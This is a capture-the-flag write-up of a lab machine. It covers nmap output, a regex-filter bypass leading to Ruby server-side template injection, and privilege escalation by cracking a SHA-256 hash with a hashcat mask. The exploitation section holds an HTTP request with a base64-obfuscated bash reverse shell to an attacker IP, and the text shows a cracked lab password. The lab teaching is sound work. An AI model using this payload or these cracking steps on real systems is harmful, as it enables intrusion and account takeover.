## User Flag
### NMAP Scan
```shell
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 12:25 MST
Nmap scan report for 10.10.11.253
Host is up (0.13s latency).
Not shown: 18 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/5%OT=22%CT=8125%CU=34776%PV=Y%DS=2%DC=I%G=Y%TM=65
OS:E771D1%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ
OS:(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53AST11
OS:NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1=FE8
OS:8%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53
OS:ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.77 seconds
```
I can see that port 80 is open and visiting the webpage shows me some interesting things.
### Investigation
![[Pasted image 20240307142618.png]]
Firstly the website states that it is powered by `WEBrick 1.7.0` and googling shows some vulnerabilities. However the biggest one is from 2008. Looking at the [ExploitDB](https://www.exploit-db.com/exploits/5215) webpage about the vulnerability gives us an example that we can use to test. Trying to navigate to `http://10.10.11.253/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini` doesn't allow us any access, therefore is probably patched.
Clicking in the link `Calculate your weighted grade` takes me to a webpage to enter in values.
### Exploitation
![[Pasted image 20240307143112.png]]
This may be exploitable. But first, we want to try and see if we can enter in real values, to see what the expected outcome would be.
![[Pasted image 20240307143323.png]]
And I get a result that shows me what my weighted grade would be.
![[Pasted image 20240307143402.png]]
Now we may be able to exploit this, if the calculations for the grade are being done Server Side. It may be vulnerable to [[Server Side Template Injection (SSTI)]]. We can enter in `${{<%[%'"}}%\` to see if there are any errors thrown that might tell us what the back-end system is being used.
![[Pasted image 20240307143930.png]]
We can see that it detected my input and blocked it. Therefore, we can assume that it is using some sort of input sanitization. Usually this is done using Regular Expressions. Sometimes these are not always configured properly and can be bypassed.
### Filter Bypass
There are some common tests that we can use to see if bypassing the filter works. Using this [cheatsheet](https://github.com/attackercan/regexp-security-cheatsheet), after trying a few, I can see that `a%0Ab` can bypass the filter and allow us to exploit SSTI. Opening the request in [[Burpsuite]] I am able to insert a malicious payload and send the packet.
```http
POST /weighted-grade-calc HTTP/1.1
Host: 10.10.11.253
Content-Length: 172
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.253
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.253/weighted-grade
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
category1=a%0Ab;<%25%3d+system("echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjExLzQ0NDUgMD4mMQ== | base64 -d | bash")+%25>+&grade1=1&weight1=100&category2=N%2FA&grade2=0&weight2=0&category3=N%2FA&grade3=0&weight3=0&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0
```
This should give me a reverse shell and after starting a listener and sending the payload, I get my reverse shell as the user `susan`
![[Pasted image 20240307151443.png]]
I can find the user flag in her home directory
## Root Flag
### Investigation
First lets start out by running [[LinPeas]]. I notice that susan is part of the sudo users group, meaning that she can run any command as sudo. However, I don't know what her password is.
![[Pasted image 20240307154639.png]]
After Linpeas finsishes, I can see that there is a credential file in susans home directory.
![[Pasted image 20240307154858.png]]
We can [[Strings]] this file and see what is inside
![[Pasted image 20240307154124.png]]
We can see that there are a lot of hashes available, however, since Susan is part of the sudo group we are focused on her hash.
### Cracking the Hash
I can attempt to identify the hash with [[hashid]]
```shell
hashid "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f" -m
```
```shell
[+] Snefru-256
[+] SHA-256 [Hashcat Mode: 1400]
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94 [Hashcat Mode: 6900]
[+] GOST CryptoPro S-Box
[+] SHA3-256 [Hashcat Mode: 5000]
[+] Skein-256
[+] Skein-512(256)
```
I can see that it is most likely SHA-256 and can use mode 1400 with [[Hashcat]]
```shell
hashcat "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f" /usr/share/wordlists/rockyou.txt -m 1400
```
Running through with the rockyou word-list , it is exhausted. Meaning that her password is nothing common, so we may have to see if there are some hints that would point us to her password or the format her password is in.
### Researching the Hash
Reviewing some more of the linpeas output, I can see that there is a file owned by root, buyt readable by me that doesn't contain world readable permissions.
![[Pasted image 20240307160023.png]]
Navigating to the file it shows an email, where susan is suggesting what the password format should be for all users on the server. (This is obviously terrible practice and all passwords and formats of passwords should be determined by the user).
![[Pasted image 20240307160326.png]]
### Cracking the Hash (Again)
From the email we can see that susan's password would be susan_nasus_{some_random_number}. Luckily, with hashcat we can supply a format and generate all possible passwords. Since we already have the first part, we just need to generate all numbers between 1 and 1,000,000,000. We can do so with the following command
```shell
hashcat "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f" -m 1400 -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
```
![[Pasted image 20240307161055.png]]
We cracked it, her credentials are `susan:susan_nasus_413759210` . Now all that's left is to try and escalate
![[Pasted image 20240307161318.png]]
We are now root and we can find the flag in roots home directory.